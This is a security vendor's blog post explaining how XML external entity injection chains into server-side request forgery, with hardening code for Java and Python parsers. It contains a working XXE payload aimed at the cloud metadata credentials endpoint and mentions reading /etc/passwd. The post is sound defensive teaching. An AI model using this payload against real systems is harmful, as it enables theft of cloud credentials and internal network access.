Skip to main content

Pentrova is launching soon. Join the waitlist for early access.Join the waitlist

Research

Sample

XXE to SSRF via DOCTYPE: exploiting and preventing XML external entity attacks

XML external entity injection does not stop at file reads. Here is how the XXE-to-SSRF chain works through DOCTYPE and how to prevent it.

XML external entity () injection does not always terminate at a file read. On an XML parser with outbound network access, the external entity reference can be redirected to a URL the attacker chooses — turning a document-parsing bug into server-side request forgery. That is the -to- chain, and it has outlived every obituary written for XML processing.

This post walks the mechanics of the chain through the DOCTYPE declaration, shows how it escalates into the cloud, and lays out the parser configuration that closes it for good.

How works through DOCTYPE#

abuses a legitimate XML feature: the document type definition (DOCTYPE) can declare external entities that the parser dereferences when it expands the document. A vulnerable parser resolves an attacker-declared entity at parse time.

<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<invoice><note>&xxe;</note></invoice>

When the parser expands &xxe;, it issues an HTTP GET from inside the target’s network. The classic file-read variant points the entity at file:///etc/passwd; the variant points it at an internal URL. sits at CWE-611 and is documented in depth in the OWASP XXE prevention cheat sheet.

Why XML processing is still in scope#

Teams assume XML is a solved, legacy concern, and that assumption is exactly why the bug persists. XML still arrives through:

  • SOAP and WSDL endpoints behind “modern” REST facades
  • Office document formats (.docx, .xlsx) that are zipped XML
  • SVG uploads, SAML assertions, and RSS/Atom ingestion
  • Configuration and invoice import features

Any one of these can reach an under-configured parser.

The escalation: from entity to cloud takeover#

Once the is confirmed, the chain extends the usual way. The most damaging pivot targets the cloud instance metadata service:

  1. confirmed — the parser dereferences the external entity.
  2. reaches metadata — the entity points at the link-local metadata endpoint (169.254.169.254).
  3. Credentials exfiltrated — instance-role credentials are returned in the parsed response or an out-of-band channel.

That is the same shape as the →CloudMeta path in Pentrova’s escalation catalog, and it converts a medium-looking parsing bug into instance-role takeover.

How Pentrova detects it deterministically#

Pentrova’s module treats every XML-accepting endpoint as a potential source. The agent supplies a payload that declares an external entity pointing at an internal canary URL, sends the document, and watches a dedicated out-of-band callback channel. A parser that dereferences the entity triggers a fetch from inside the target’s network — and the callback is the signal. Reporting on a callback rather than a reflected string is what keeps the finding deterministic; the same out-of-band discipline drives our Log4Shell detection.

The full sequence lives in the catalog as a multi-step chain, reproduced safely under sandbox guardrails at every step, so the report shows not just “is it vulnerable” but “what an attacker can reach from here”.

How to prevent #

The fix is almost always a one-line parser configuration: disable external entity and DTD processing. Concrete examples:

// Java — harden DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
# Python — use defusedxml instead of the stdlib parser
from defusedxml.ElementTree import parse
tree = parse("invoice.xml")   # rejects DOCTYPE / external entities by default

The principle generalises: disallow the DOCTYPE declaration where you can, disable external general and parameter entities everywhere, and deny outbound network egress from parsing workloads as defence in depth.

Key takeaways#

  • abuses the DOCTYPE declaration to make a parser dereference an attacker-chosen entity.
  • With outbound access, that entity becomes — and reaching cloud metadata becomes credential theft.
  • XML is still everywhere (SOAP, Office files, SVG, SAML), so the bug remains live.
  • The fix is to disable DTD and external-entity processing in the parser; deny egress as a backstop.

FAQ#

What is the difference between and ? is the injection point — an XML parser dereferencing an attacker-declared entity. is the impact when that entity points at a URL, making the server issue a request on the attacker’s behalf. -to- is the chain that connects them.

Can be exploited without seeing the response (blind )? Yes. Blind uses out-of-band techniques — an external DTD that forces the parser to send data to an attacker-controlled server. Pentrova confirms exactly this case by watching an out-of-band callback channel rather than relying on a reflected response.

Does disabling DTDs break legitimate XML? Rarely. Most applications parse data documents that have no legitimate need for external entities. Disabling the DOCTYPE declaration is the safest default; where a DTD is genuinely required, disable only external entity resolution.

See how the chain runs end to end in API Pentesting, or start a free engagement.

Updated

Written by

Pentrova Research Pentrova Research

Pentrova Research writes about deterministic offensive-security proof, LLM-driven pentest chains, and how to ship exploit-grade evidence into engineering pipelines.

Keep reading

Site search

↑↓ navigateEnter openEsc close